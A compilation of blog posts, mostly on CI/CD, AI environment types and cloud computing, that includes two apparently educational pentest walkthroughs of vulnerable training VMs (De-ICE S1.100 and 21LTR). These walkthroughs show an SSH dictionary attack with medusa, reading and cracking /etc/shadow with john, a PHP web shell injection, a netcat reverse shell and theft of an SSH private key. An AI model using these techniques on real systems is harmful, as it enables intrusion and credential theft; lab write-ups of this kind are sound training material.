CD: Continuous Delivery

Nowadays, our development teams use Agile methodologies what means that we have accelerate our processes trying to deliver small chunks of functionalities to receive early and real feedback from users to continue iterating our ideas.

Now, we are an organization that follow and use Continuous Integration practices but, we are still missing something. We are not able to receive this feedback if it takes ages between our developers finishing their tasks and the code been deployed in to production where our users can use it. In addition, when a lot of changes or features are delivered at the same time, it makes more difficult to debug bugs on solve possible errors. For a long time, the deployment process has been seen as a risky process that requires a lot of preparation but, this needs to change if we want to be truly Agile.

Here it comes Continuous Delivery (CD). Continuous Delivery is a practice that tries to make tracking and deploying software trivial. The goal is to ship changes to our users early and often, multiple times a day if possible, to help us minimize the risk of releasing, and giving our developers the opportunity to get feedback as soon as possible.

As I have said before, we should have already a Continuous Integration environment to ensure that all changes pushed to the main repository are tested and ready to be deployed. Can it be done without a CI environment? Yes, probably, but more probably we are going to create a machine that it is just going to push our bugs faster to production increasing our risks.

Steps we need to take

Create a continuous delivery pipeline

The continuous delivery pipeline is a list of steps that happen every time our code changes till it finds its way to production. It includes building and testing the application as part of the CI process and extends it with the ability to deploy to and test staging and production environments.

With this we will achieve two things:

  • Our code will be always ready to be deployed to production.
  • Releasing changes will be as simple as clicking a button.

Create a staging environment

All of us, generally, have been writing code in some point in our lives, some of us still do it, some of us have evolve our careers but, something that I am sure all of us remember are these cases of “it worked on my machine…”. Configurations, differences in environments, networks… There are thousands of things that can be different and can go wrong, and probably it will go. No matter how many test we have locally, how many precautions we take, our local conditions are not going to be the same than our production conditions. For this reason we need an intermediate environment, the “staging” environment.

The “staging” environment does not need to support the same scale as our production environment but it should be as close as possible to the production configuration to ensure that the software is tested in similar conditions.

The “staging” environment should allow us to see things before it happen. If something is going to break, it should break in this environment. Using this environment, our release workflow should be similar to:

  1. Developers build and test locally a feature.
  2. Developers push their changes to the main repository where CI tests run automatically against their commits.
  3. If the build is green, the changes are released to the staging environment.
  4. Acceptance tests are run against the staging environments to make sure nothing is broken.
  5. Changes are now ready to be deployed to production.

An additional advantage is that it allows our QA team and product owners to verify the software works as intended before releasing to our users, and without requiring a special deployment or access to a local developer machine.

Automate our deployment

Or, we need to create a “green button” that once it has been pressed, without any other human intervention is going to deploy our code in staging or production.

We can start building some scripts that we run from our development machines and, after that, we can add them to a any CI platform.

There are many ways to deploy software, but there are common rules that maybe we can use as guidance:

  • Version the deployment scripts with our code. That way we will be able to audit changes to our deployment configuration easily if necessary.
  • Do not store passwords in our script. Instead, use environment variables that can be set before launching the deployment script.
  • Use SSH keys when possible to access the deployment servers. They will allow us to connect to our servers without providing a password and will resist a brute force attack.
  • Make sure that any build tools involved in the pipeline does not prompt for user input. Use a non-interactive mode or provide an option to automatically assume yes when installing dependencies.
  • Test it, test it and test it again. Make sure everything deploys as expected, that nothing is missing no matter what kind of changes you are doing.
  • Maybe, it is a good moment to write some smoke test, if you do not have it, to check if your machines are up an running.

Include data structure changes

Let’s face it, when our application changes the code is not the only thing changing. The data structures change too. And, we are not going to have a CD environment if this changes are not added to our automatic deployments.

First, create backups. No matter how good we are, how little is the change, something is going to fail in some point and we want to be able to restore the previous state of the application.

Second, there are multiple tool that can help manage data structure changes as code. Some frameworks bring their own to the table but, if not, we can find tools that fit our technologies and ideas. Just learn them and use them.

All together and the last detail, the CI server

Arriving here, we have set a CI environment with a CI server and we have a “button” to run our deployments, now, why not put everything together?

To do this, we just need to add a manual step in our pipeline to release (press the button) the code to our different environments.

Now, every time our code is merged and ready to production, following business needs, we just need to push the button and release. This give us a great control of our deployments. The only precaution we need to take is not to leave to many commits accumulated.

CD: Continuous Delivery


The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.



The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.


PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of – no additional configuration is necessary.


ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command, but in this case is going to fail, or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. We can see a brief explanation about the challenge and not much more than that. But, we can see a very important thing here. Reading carefully the page we can see there are some email related with the company.

Head of HR: Marie Mary - (On Emergency Leave) 
Employee Pay: Pat Patrick -
Travel Comp: Terry Thompson -
Benefits: Ben Benedict -
Director of Engineering: Erin Gennieg -
Project Manager: Paul Michael -
Engineer Lead: Ester Long -
Sr. System Admin: Adam Adams -
System Admin (Intern): Bob Banter -
System Admin: Chad Coffee -

We should pay special attention to the last three because they are admin users.

This gives us a few information:

  • Names of people that is working in the company.
  • Valid emails.
  • Examples of how they are creating usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v
Figure 2. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service. And, something is not right here.
  • 22 SSH service
  • 25 SMTP service
  • 80 HTTP service
  • 110 POP3 service
  • 143 IMAP service

Considering we do not have any other information, we need to start thinking in what we are missing. We already have some valid email, with this information we can create a list of possible users in the system. In addition, we can add users like “root” or “admin” or similar users that are always useful to have. In this case, our list can be something like:

aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech

Now, that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” trying to do a dictionary attack to see if we are lucky.

medusa -h -U users.txt -P passwds.txt -M ssh -v 4 -w 0
Figure 3. medusa result

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
Figure 5: Available tools

We can see we can use the tool “cat” to read file content. Then, let’s check the files “/etc/passwd” and “/etc/shadow”.

Figure 6: /etc/shadow content

With a simple copy and paste we can move the content of both files to our machine to try to use “John” to discover new passwords, specially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow pasad_file.txt shadow_file.txt > root_password.txt


Figure 7. unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have an operative user “aadams” we can copy the “root” credential to a file and try to break just the “root” password.

john just_root.txt
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@
Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as “root” user using SSH. But, we are still having the “root” password and a valid user “aadams”. Let’s try to login as “root” using our valid user

Figure 10: We are root!

Usually, now that we are root we can close the case and deliver our report, but going around a little bit we can find an interesting file, and considering this is a training exercise, we can play a bit more. The file is this one

Figure 11. Curious file
Figure 12. encripted file, maybe
bin walk salary_dec2003.csv.enc
Figure 13. confirming is an excerpted file

What do we know about the file:

  • It is encrypted with OpenSSL.
  • It was in a folder only accessible by the “root” user. We can think that maybe it is going to be encrypted using the “root” password we have.
  • We know that we do not know the type of cipher.

We can check the type of ciphers that OpenSSL offers.

openssl enc help
Figure 14. Available ciphers

Let’s try on of them out of curiosity to see how an error looks like, and after that, let’s try to figure out how to try/apply all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
Figure 15. decripting file

I guess that it is because it is just a training environment but the one that does the job is the first one. No more attempts are needed. In the real world probably we should write a script to test all the cipher available.

Figure 16. File decrypted

With this our scenario finish. We have access to the machine, we have root permissions and we have decrypted the “salary” file, our job is done. It has been interesting but I thing that it is just possible because the passwords where not very strong.



Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.


Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest: – All tests will be restricted to the systems identified on the network. – All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report – A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.


Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of – no additional configuration is necessary.


ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. In this case the web page give us a few information and nothing interesting but, the source code os the page give us the first good information. As a comment in the page, we can find some credentials

Figure 2. Credentials found in the source code

There is nothing else to do here but to be sure we are not missing some pages or folders let’s run a different tools against the web page to check it. The tool is going to be “dirb”

Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is the “/logs”. Unfortunately, returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v
Figure 4. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: In this point, I am not sure what is this. In addition, it does not show always in the scanner results.

Considering we have some credential, lets try to connect to the different services. There is no luck with the SSH access but the FTP allows us to connect and try to explore. Unfortunately, we can just file one file.

Figure 5. FTP exploration results

Considering we have found a folder “/logs” previously and we have found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.


At this point, I must recognize that I was a bit lost and running out of ideas, then, in the meantime I went for a walk I left the “Wireshark” tools running. Why? Because both are good ideas, go for a walk when you are block and because you never know what you can find in the network. After taking a look to the traffic I saw some (a lot) calls asking for the IP address “”.

Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn on again the “Wireshark” to see what happen and, I have one interesting event. Apparently the training machine wants to establish a connection with “” (my machine now) with the port 10000.

Figure 8. Wireshark results

Then, lets allow this connection to see what happen. To allow this, let’s execute “necat” and wait again.

nc -lvvp 10000 > output

Here wee can see the connection is done in some point and we have what it looks like a binary file called “output”. After a some investigation, we can see it is a “tar.gz” file (using exiftool) and we cannot find anything interesting in the file, but it is clear that it is a backup file.

Figure 9. Wireshark result
exiftool --list output
Figure 10. exiftool result
014-downloaded file
Figure 11. Exploring backup file

Linking that in the “nmap” there is a port 10001 we do not know what it is, we have in the server a page that shows backup result messages and that we are obviously downloading a backup file, we can infer that maybe the port 10001 just open when its waiting for a response about the sent backup. To test this theory, let’s try to connect to the port 10001 when the backup is sent. Because we do not know when it is going to be send, let’s just try to connect multiple times.

while true; do nc -v 10001 && break; sleep 1; clear; done

After a few minutes, the connection is stablished and we can type a few instructions.

Figure 12. Wireshark results

Apparently, they are doing nothing but, when we go again to the backup log messages pages we can see what we have been typing.

Figure 13. Messages typed

Then, let’s try to type something that allow us to do something useful and to have access to the training machine. Let’s try to inject a PHP on-line webcell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent
011-curl to cmd.png
Figure 14. Connection result

As we can see (end of the image) we are connected as “apache” to the training machine. Now, let’s try to have a proper shell where to execute command and take a look properly to the system. We are going to a port in our system and try to connect with a shell process from the training machine.

nc -lvvp 443
curl --silent #

And, success, we have our shell.

012-remote conexion
Figure 15. Shell in the training machine

The next step it is to try to find the credential files and see their content but, unfortunately, we can just list the file “/etc/passwd” and the credentials are (I guess) in “/etc/shadow” that I cannot list.

Our next step is going around the machine to see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: With the key of the authorized users to connect with SSH. In this case “hbeale”
  • id_rsa: The private key to connect to SSH
Figure 16. User with SSH access
Figure 17. Private key

Coping the key to our system we can try to connect.

ssh hbeale@
Figure 18. SSH access

Checking what command we can execute as “sudo”. We can see we can use the tools “cat” to read file content.

sudo -l
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

Figure 20. /etc/shadow content

Here we can see the hash for the “root” user and copy it to a file in our system (root_password). Let’s try to increase our privileges cracking the hash with “John” (the tools John) and using one of the dictionaries that comes with Kali.

john --wordlist=rockyou.txt root_password
Figure 21. John’s execution

We are lucky, John has done its job properly and we have the password “formula1”. Let’s try it.

Figure 22. We are root!

With this our scenario finish. We have access to the machine and we have root permissions, our job is done. It has been funny and frustrating but I do not thing there would be the first one without the second one.

Walkthrough: 21LTR: Scene 1

Artificial Intelligence: Type of environments

Let’s first describe what is an agent in artificial intelligence. An intelligent agent is an autonomous entity which observes through sensors and acts upon an environment using actuators and directs its activity towards achieving goals. Intelligent agents may also learn or use knowledge to achieve their goals. They may be very simple or very complex.

When designing artificial intelligence solutions we need to consider aspects such as the the characteristics of the data (classified, unclassified, …), the nature of learning algorithms (supervised, unsupervised, …) and the nature of the environment on which the AI solution operates. We tend to spend big amounts of time in the first two aspects but it turns out, that the characteristics of the environment are one of the absolutely key elements to determine the right models for an AI solution. Understanding the characteristics of the environment is one of the first tasks that we need to do. From this point of view we can consider several categories.

Fully vs Partial observable

An environment is called fully observable if what your agent can sense at any point in time is completely sufficient to make an optimal decision. For example, we can imagina a card game where all the cards are on the table, the momentary site of all those cards is really sufficient to make an optimal choice.

An environment is called partialy observable where you need memory on the side of the agent to make the best possible decision. For example, in the poker game the cards are not openly on the table, and memorizing past moves will help you make a better decision.

Deterministic vs Stochastic

A deterministic environment is one where your agent’s actions uniquely detemine the outcome. For example, in the chess game there is really no randomness when you move a piece, the effect of moving a piece is completely predetermined and, no matter where I am going to move the same piece, the outcome is the same.

A stochastic enviroments there is a certain amount of radomness involved. Games that involve a dice, are stochastic. While you can still deterministically move your pieces, the outcome of an action also involves throwing the dice, and you cannot predict it.

Discrete vs Continuous

A discrete environment is one where you have finitely many action choices, and finitely many things you can sense. For example, the chess has finitely many board positions and finately many things you can do.

A continuous environment is one where the space of possible actions or things you could sense may be infinite. In the game of dards, throwing a dard we have infinite ways to angle it and accelerate it.

Benign vs Adversarial

In benign environments, the environment might be random, it might be stochastic, but it has no objective on its own that would contradict the own objective. Weather is benign, it might be ramdon, it might affect the outcome of your actions but it is not really out there to get you.

In adversarial environemnts, the opponent is really out to get you. In the game of chess the enviroment has the goal of defeat you. Obviously, it is much harder to find good actions in adversarial environments where the opponent actively observes you and counteracts what you are trying to achieve than in benign environments.

I have seen a few more classifications or specifications but, more or less, all of them list the same categories or very similar categories.

Note: Article based on my notes of the course Intro to Artificial Intelligence | Udacity

Artificial Intelligence: Type of environments

CI: Continuous Integration

Continuous integration (CI) is a practice where team members integrate their code early and often to the main branch or code repository. The objective is to reduce the risk, and sometimes pain, generated when we wait till the end of the sprint or project to do it.

One of the biggest benefits of the CI practices is that it allows us to identify and address possible conflicts as soon as possible with the obvious benefit of saving time during our development. In addition, it reduces the amount of time spent in regresion test fixing bugs because it encorages to have a good set of tests. Plus, it gives a better understaning of the features we are developing and the codebase due to the continuous integration of features in our codebase.

What do we need?

Tests, test, tests… Automatic tests

To get the full benefits of CI, we will need to automate our tests to be able to run them for every change that is made to the repository. And when I say repository, I want to say every branch and not just the main branch. Every branch should run the tests and it should not be merged till they are green, all of them. In this way, we will be able to capture issues early and minimise disruptions to our team.

Types of tests

There are many types of tests that can be implemented. We can start small and grow progressibely our coverage. The more meaningfull tests we have the better but, we are running a project, we should find a balance between releasing features and increasing our coverage.

How many should I implement?

To decide about that, we just need to remember two things. The first one is that we want meaninful tests, we should not care about the number of tests we should care about how useful are they. We should write enought tests to be confident that if we introduce a bug (technical or business) we are going to detect it. And second, we should take a look to “The Testing pyramid“, here you can find a link to an artiche of Martin Fowler. Basically, explaing from a cost-efective comparation point of view the amount and type of tests we should write.

Running your tests automatically

One of the things we have discussed we need, it is to run our tests on every change that gets pushed. To do so, we will need to have a service that can monitor our repository and listen to new pushes to the codebase. There are multiple solutions, both, on-premise and in the Cloud.

There are a few considerations we need to think about when we are trying to evaluate a solution like: Platform, resources, access to our repositories, … Some examples are Travis CI, Bamboo or Jenkins.

Immersion in CI

This is not just a technical change, we need to have in mind when we are trying to addopt CI that it is a cultural change too.

We need to start integrating code more often, creating shorter stories or breaking them in short deliverables, we need to keep always the build green, we need to add test in any story, we can use even refactor tasks to add tests and increase our code coverage. We should write test when we fix bugs and so on.

One group of your team that is going to be affected directly by this change is our QA group. They no longer need to test manually trivial capabilities of our application and they can now dedicate more time to providing tools to support developers as well as help them adopt the right testing strategies. Our QA Engineers will be able to focus on facilitating testing with better tooling and datasets as well as help developers grow in their ability to write better code. They will need to test manually some complex stuff but it will not be their main task anymore.

Quick summary

Juts a quick sumarry of the roadmap to addopt CI, we can list the next points:

  1. Start writing code for the critical parts in your system.
  2. Get a CI system to run our tests after every push.
  3. Pay attention to the culture change. Help our team to understand and to achieve.
  4. Keep the build green.
  5. Write tests as part of every story, every bug and every refactor.
  6. Keep doing 4, 5 and 6.

At the beginning, cultural changes are scary and they feel impossible but the rewards sometimes deserve the effort. A new project, if we have one, it is maybe a good option to start changing our minds and taking a CI approach in the development life cycle. If we start with and existing proyect, start slow, step by step but always going forward. And, we should always remember that, this is not just a technological change, it is a cultural change too, explain, share and be patient.

CI: Continuous Integration

CI, CD and CD

When we talk about moder development practices, we often listen some acronyms among we can find CI and CD when we refer the way we build and release software. CI is pretty straightforward and stands for continuous integration. But CD can either mean continuous delivery or continuous deployment. All these practices have things in common but also, they have some significant differences. We are going to explain these similarities and differences.

Continuous integration

In environments where continuous integration is used, developers merge their changes in the main branch as often as the can. These changes are validated by creating a build and running automated tests against the build. Doing this, we avoid the old times painful releases when everything was merged in the last minute.

Continuous integration practice puts a big emphasis on automation testing to keep a healthy build each time the commits are merged in the main branch warning quickly about possible problems.

Continuous delivery

Continuous delivery is the next step towards the release of your changes. This practice make sure you can release to your customers as often and quickly as you want. This means that on top of having automated your testing, you also have automated your release process and you can deploy your application at any point of time by clicking on a button.

With continuous delivery, you can decide to release daily, weekly, fortnightly, or whatever suits your business requirements. However, if you truly want to get the benefits of continuous delivery, you should deploy to production as soon as possible to make sure that you release small batches, that are easy to troubleshoot in case of problems.

Continuous deployment

But, we can go another step farther, and this step is continuous deployment. With this practice, every change that passes all stages of your production pipeline is released to your customers. There is no human intervention (no clicking a button to deploy), and only a fail in test time will prevent a new change to be deployed to production.

Continuous deployment is an excellent way to accelerate the feedback loop with your customers and take pressure off the team as there is not a ‘release day’ anymore. Developers can focus on building software, and they see their work go live minutes after they have finished working on it. Basically, when a developer merges a commit in the main branch, this branch is build, tested and, if everything goes well, deployed to production environments.

Can I use all of them together?

Of course you can, as I have said, each one of them its just a step closer to the production environment. You can set your continuous integration environment, after that, once the team is comfortable, you can add continuous delivery and, finally, continuous deployment can be added to the picture.

Example of CI, CD and CD pipeline

Is it worth it?

Continuous integration:

What it needs from you:

  • Your team will need to write automated tests for each new feature, improvement or bug fix.
  • You need a continuous integration server that can monitor the main repository and run the tests automatically for every new commits pushed.
  • Developers need to merge their changes as often as possible, at least once a day.

What it gives to you:

  • Less bugs get shipped to production as regressions are captured early by the automated tests.
  • Building the release is easy as all integration issues have been solved early.
  • Less context switching as developers are alerted as soon as they break the build and can work on fixing it before they move to another task.
  • Testing costs are reduced drastically – your CI server can run hundreds of tests in the matter of seconds.
  • Your QA team spend less time testing and can focus on significant improvements to the quality culture.

Continuous delivery

What it needs from you:

  • You need a strong foundation in continuous integration and your test suite needs to cover enough of your codebase.
  • Deployments need to be automated. The trigger is still manual but once a deployment is started there should not be a need for human intervention.
  • Your team will most likely need to embrace feature flags so that incomplete features do not affect customers in production.

What it gives to you:

  • The complexity of deploying software has been taken away. Your team does not have to spend days preparing for a release anymore.
  • You can release more often, thus accelerating the feedback loop with your customers.
  • There is much less pressure on decisions for small changes, hence encouraging iterating faster.

Continuous deployment

What it needs from you:

  • Your testing culture needs to be at its best. The quality of your test suite will determine the quality of your releases.
  • Your documentation process will need to keep up with the pace of deployments.
  • Feature flags become an inherent part of the process of releasing significant changes to make sure you can coordinate with other departments (Support, Marketing, PR…).

What it gives to you:

  • You can develop faster as there is no need to pause development for releases. Deployments pipelines are triggered automatically for every change.
  • Releases are less risky and easier to fix in case of problem as you deploy small batches of changes.
  • Customers see a continuous stream of improvements, and quality increases every day, instead of every month, quarter or year.

As said before, you can adopt continuous integration, continuous delivery and continuous deployment. How you do it depends on your needs and your situation. If you are just starting a project and you do not have customers yet you can go for it and implement the three of them and just iterate on them at the same time you iterate on your project and your needs grow. If you have already a project in production you can just go step by step and adopting the practices first in your staging environments.

CI, CD and CD

Advantages of Cloud Computing

Nowadays, it is clear that cloud computing has revolutionized how technology is obtained, used and managed. And all of this has changed how organizations budget and pay for technology services.

Cloud Computing has given us the ability to reconfigure quickly our environments to be able to adapt them to changing business requirements. We can run cost effective services that can scale up and down depending on usage or business demands and, all of this, using pay-per-use billing. Making unnecessary huge upfront infrastructure expenses for enterprises, and balancing the possibilities between been a big enterprise or a new one.

There are multiple and diverse advantages, and most of them depend on the enterprises, the business and the needs they have. But, there are six of them that tend to appear in every case:

Variable vs. Capital Expense

Instead of having to invest in data centers and servers before knowing how they are going to be used, they can be paid when you consume computing resources and paid only for how much you consume.

Economies of Scale

By, using cloud computing, we can achieve a lower variable costs that we would get on our own. Cloud providers like AWS can aggregate hundred of thousands of customers in the cloud, achieving higher economies of scale, which translates in lower prices.

Stop Guessing Capacity

When we make a capacity decision prior to deploying an application, we usually end up either setting expensive idle resources or dealing with limited capacity. With cloud computing there is no more need for guessing. The cloud allow us to access as much or as little as we need to cover our business needs and to scale up or down as required without advanced planning, with in minutes.

Increase Speed and Agility

Deploy new resources to cover new business cases or implementation of prototypes and POCs to experiment now can be achieved with a few clicks provisioning new resources in a simple, easy and fast way usually reducing costs and time and allowing companies to adapt or explore.

Focus on Business Differentiators

Cloud computing allows enterprises to focus on their business priorities, instead of on the heavy lifting of racking, stacking, and powering servers. This allows enterprises to focus on projects that differentiate their businesses.

Go Global in Minutes

With cloud computing enterprises can easily deploy their applications to multiple locations around the world. This allows to provide redundancy and lower latencies. This is not any more reserved just for the largest enterprises. Cloud computing has democratized this ability

Advantages of Cloud Computing